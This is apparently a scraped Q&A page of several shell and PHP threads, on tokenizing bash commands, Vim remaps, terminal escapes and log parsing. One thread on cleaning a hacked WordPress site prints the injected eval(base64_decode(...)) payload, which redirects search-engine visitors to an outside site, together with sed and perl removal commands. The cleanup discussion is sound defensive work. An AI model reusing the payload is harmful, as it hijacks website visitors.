What is the best way to tokenize bash shell command in PHP?

What is the best way to tokenize bash shell command in PHP? - php

I am in a situation where I need to take a (potentially) multi-string bash command and squash it into one string that doesn't contain any newline or carriage return characters (yet produces the same result, i.e. command semantics must not be affected).
Below are a few examples of inputs and corresponding expected outputs.
INPUT:
echo A
echo B
EXPECTED OUTPUT:
echo A;echo B
INPUT
echo "continued
string"
echo "other"
EXPECTED OUTPUT:
echo "continued"$'\n'"string";echo "other"
INPUT
cat file1 \
file2 \
file3
EXPECTED OUTPUT:
cat file1 file2 file3
INPUT
for f in `pwd`/*
do
{ echo A; echo B
echo C; echo D; }
done
EXPECTED OUTPUT:
for f in `pwd`/*; do { echo A; echo B; echo C; echo D; }; done
And so on. Obviously I cannot just
preg_replace('/[\r\n]+/', ';', $input);
because shell supports compound commands and command lists, multiline strings, multiline command continuation operator ('\') and many more. Seems like I have no other way but to tokenize the input command and go from there. My bash knowledge is mediocre so there may be cases that I missed and they need to be handled by the solution as well.
Is there an existing PHP library or package (I have searched packagist to no avail) that would help me get closer to my goal? If no, how would you approach this challenge (no need to write code, just point a finger in a right direction).
As a desperate fallback I'll have to resort to porting the bash source code itself, but I really hope that someone will suggest a shortcut.

Trying to create a parser for bash is very ambitious (and ambiguous) project . Bash is constantly evolving, and in certain areas, push the boundary beyond the POSIX standard. Consider scaling down the project - may be target the Posix shell (which will cover many shell variant: dash, ash, ...).
Consider starting with https://pubs.opengroup.org/onlinepubs/9699919799/ It identifies few quoting options. If you implement those carefully, your approach (replacing end-of-lines with ';' may work).
Another alternative will be to start with bash syntax highlighter, for example the vim highlighter. (/usr/share/vim/vimNN/syntax/sh.vim, where NN is vim version).

Related

Vim replace text on the fly ( "." => "->")

I have this project in php I am working on and I find very annoying to type -> to call methods. I want to make vim do the job for me. I want it to replace [^\s]. (non space + dot) with ->.
Also, I the dollar var prefix annoys me and I wish I could replace \s[a-z_] (white space followed by lower A to Z and underscore) with $ + the next letter I typed.
I.E.
a #=> $a
foo + bar # => $foo + $bar
this #=> $this
this.myMethod() #=> $this->myMethod()
That should happen only in php files, of course.
Is there a way to accomplish that? Something a little fancier than abbreviations maybe.

For the first problem:
inoremap . ->
in your .vimrc would suffice. If you want it specific to php files:
filetype on
autocmd FileType php inoremap . ->
As for the second, I don't really see a way this can be written to work automatically.

I am not sure if this is good idea to handle your source code in this way, since it could destroy your codes, however for your requirement, this line do the two substitution you wanted:
%s/\v(\s|^)\ze[a-z_]/&$/g|%s/\./->/g
at least it works for the example you gave.

Though you can build such "conditional remappings" with :imap <expr>, I highly recommend against doing that.
Your stated rules are still way too simplistic; the first one wouldn't allow you to enter any comments like Just a hack. (would turn into Just a hack->). You'll spend more time (laboriously) tweaking your rules, or undoing / suppressing the automatic conversion, just for saving a single keystroke here and there.
Imagine yourself in another editor, debugger, a colleague's laptop. Now you're dependent on your auto-conversion scheme, and you'll look like a fool!
For me, it looks like you're coming from a different knowledge and still feel the beginner's pain of walking in unknown terrain. Persevere; you'll get over that soon!

Deleting base64 Eval Junk with (osx) terminal

Trying to clean up after a slew of php injections -- every php function in about six sites worth of WordPress templates is full of junk.
I've got everything off the server, onto a local machine, and I'm hoping there should be a good way to delete all of the enormous code strings with terminal.
Of which I know approximately nothing.
http://devilsworkshop.org/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/ had good instructions for doing a clear on the server, but substituting my path/to/folder doesn't seem to be working in terminal.
Feeling I'm close, but, blind as I am to the ways of the terminal, that doesn't seem that comforting.
Based on the above, here's what I've got -- any help would be so amazingly appreciated.
grep -lr --include=*.php "eval(base64_decode" "/Users/Moxie/Desktop/portfolio-content" | xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'
UPDATED
derobert -- thanks a million for helping with this --
basically, the space after every <?php before the actual function had this inserted into it:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LnN0bHAuNHB1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));
The characters change with each one, so a simple find and replace won't work (which was, I'm pretty sure, the point).

here is my code that proved as a valid solution.
I downloaded all the files to my local machine and started working on solution. Here is my solution {combination with what I goggled out}
#!/bin/bash
FILES=$(find ./ -name "*.php" -type f)
for f in $FILES
do
echo "Processing $f file LONG STRING"
sed -i 's#eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93a3BiLjI1dS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));##g' $f
echo "Processing $f file SMALL STRING"
sed -i 's#eval(base64_decode.*));##g' $f
done
save it somewhere as mybash.sh {from your favourite text editor}
$ sudo chmod +x mybash.sh //execute permission for script
$ ./mybash.sh
I have used the first one LONG STRING cause the pattern is always the same. Here is the explanation for the above code
s# - starting delimiter {#-delimiter same as / as in rule for sed}
eval(base64_decode.)); { first pattern to match, Reg Exp [. - Matches any single character], [ - Matches the preceding element zero or more times]}
# - second appearance of delimiter {#}, after # is empty which basically means replace first string {eval(base64_decode.*));} WITH {''}
#g - end of command, SED syntax

So, someone got access to write to arbitrary files on your server. I assume you've cleaned up the exploit that let them in already.
The problem is, while the eval(base64_decode stuff is obvious, and has to go, the intruder could have put other stuff in there. Who knows, maybe he deleted a mysql_real_escape_string somewhere, to leave you vulnerable to future SQL injection? Or a htmlspecialchars, leaving you vulnerable to JavaScript injection? Could have done anything. Might not even be PHP; you sure no JavaScript was added? Or embeds?
The best way to be sure is to compare to a known-good copy. You do have version control and backups, right?
Otherwise, you can indeed use perl -pi -e to do a substitute on that PHP code, though matching it might be difficult, depending. This might work (work on a copy!), and adjust spacing in the regexp as needed:
perl -pi -e 's!<\?php eval\(base64_decode\(.*?\)\) \?>!!g' *.php
but really, you should review each file by hand, to confirm there are no other exploits present. Even if your last known-good copies are somewhat old, you can review the diffs.
edit:
Ok, so it sounds like you don't want to nuke the whole PHP block, just the eval line:
perl -pi -e 's!eval\(base64_decode\(.*?\)\);!!g' *.php
You may want to add a \n before the first ! if there is additionally a newline to kill, etc. If the base64 actually has newlines in it, then you will need to add s after the g.

Shell script to recursively rename filenames with special characters escaped?

Php has a method escapeshellcmd() that escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands.
<?php
exec(find /music -type f -iname '*mp3'", $arrSongPaths);
echo $arrSongPaths[0] //prints It WonÃ‚Â´t Be Long.mp3;
echo escapeshellcmd($arrSongPaths[0]) //prints It Wont Be Long.mp3;
?>
Is there a way to write a shell script that will recursively rename filenames (in particular *mp3) with special characters escaped?
I tried to do this in php
$escapedSongPath = escapeshellarg($arrSongPaths[0]);
exec("mv $arrSongPaths[0] $escapedSongPath");
but that didn't work. Anyways the last line of code is unsafe since you're executing a command with a potentially dangerous filename $arrSongPaths[0].

For the love of all things security related why aren't you using the php rename command - it doesn't suffer from any shell escape issues. replace the exec("mv ...") with:
rename($arrSongPaths[0], $escapedSongPath)
... and check for errors.
And instead of using exec(find...) use the recursive_glob tip from the glob php operation page.

multi-line terminal progress indicator?

In a terminal, if I'm outputting a one-line progress indicator of some sort, in-place, \r would do the trick:
while (1) { echo "progress indication\r"; }
However, I have a progress indicator that really should be multi-line. As \r only returns to the start of the current line, I want something that can move up a couple of lines. Is there a control character/function that allows me to step back lines in the terminal?
Edit: in case I wasn't completely clear, I wish to have something roughly the opposite of \v, the vertical tab, which moves the terminal cursor down a line.

There is no control character to go back onto the previous line, but depending on the TERM= type a ANSI escape might do the trick.
echo -e "\033[2A"
Here's a list that might be more helpful: http://en.wikipedia.org/wiki/ANSI_escape_code and for usage in the shell http://www.linuxselfhelp.com/howtos/Bash-Prompt/Bash-Prompt-HOWTO-6.html

How to extract block of XML from a log file on Linux

I have a log file that looks like the following:
2010-05-12 12:23:45 Some sort of log entry
2010-05-12 01:45:12 Request XML: <RootTag>
<Element>Value</Element>
<Element>Another Value</Element>
</RootTag>
2010-05-12 01:45:32 Response XML: <ResponseRoot>
<Element>Value</Element>
</ResponseRoot>
2010-05-12 01:45:49 Another log entry
What I want to do is extract the Request and Response XML (and ultimately dump them into their own single files). I had a similar parser that used egrep but the XML was all on one line, not multiple ones like above.
The log files are also somewhat large, hitting 500-600 megs a log. Smaller logs I would read in via a PHP script and use regex matching, but the amount of memory required for such a large file would more than likely kill the script.
Is there an easy way using the built-in tools on a Linux box (CentOS in this case) to extract multiple lines or am I going to have to bite the bullet and use Perl or PHP to read in the entire file to extract it?

# Example usage:
# perl script.pl data.xml RootTag > RootTag.xml
use strict;
use warnings;
my $tag = pop;
while (<>){
if ( s/.*(<$tag>)/$1/ .. s/(<(\/)$tag>).*/$1/ ){
print;
last if $2;
}
}
See the docs for details on the flip-flop operator.

Sounds like a job for sed (I was so tempted to say SuperSed ;-)
sed -n '/^<.\+>/H; /\(Request\|Response\) XML/{s/^.*</</;x;p}; ${x;p}' xmllog
where xmllog is your log file's name. You'll get a blank line at the beginning, but that can be filtered out with egrep '.+' or even just tail -n +2.
By way of explanation, sed is a little interpreter for programs that consist of a list of matching conditions and corresponding actions. sed runs through a file line by line (hence the name, "stream editor" -> "sed") and for each line, for each condition in the program that matches the text on the line, it applies the corresponding action. In this case:
/^<.\+>/
is a regular expression condition that matches any line which contains < followed by any character (.) repeated one or more times (\+) followed by > - basically any line with an XML tag. The associated action is H which appends the line to a "hold buffer". The other condition is
/\(Request\|Response\) XML/
which, of course, is a regexp that matches either Request or Response followed by a space and then XML. The corresponding action is
{s/^.*</</;x;p}
which first does a substitution (s) of the beginning of the line (^) followed by any character (.) repeated any number of times (*) followed by <, with just <. Basically that gets rid of anything before the first XML tag on the line. Then it switches (x) the line just read with the "hold buffer" (which contains the XML of the previous log message) and prints (p) the stuff that was just swapped in from the hold buffer. Finally,
$
matches the end of the input, and {x;p} again just swaps the contents of the hold buffer into the "print buffer" and then prints it.
You can alter the command to suit your needs, for example if you need something to delimit the different records, this'll put a blank line between them:
sed -n '/^<.\+>/H; /\(Request\|Response\) XML/{s/^.*</\n</;x;p}; ${x;p}' xmllog
(in that case, of course, don't use egrep to filter out the blank line at the beginning).

Your question implies you're not thinking right; if there's a way to do what you're asking in one language (there is) ... then you can do it in any language.
There's no reason to read the entire log into memory. You just read it line by line and extract the information you want. You just need to keep a state as to where you are (not in tag, inside RootTag, inside ResponseRoot, etc) and process the data as you wish.

We Keep Coding

PHP, A popular general-purpose scripting language that is especially suited to web development.

What is the best way to tokenize bash shell command in PHP? - php

Related

Vim replace text on the fly ( "." => "->")

Deleting base64 Eval Junk with (osx) terminal

Shell script to recursively rename filenames with special characters escaped?

multi-line terminal progress indicator?

How to extract block of XML from a log file on Linux

Categories

Resources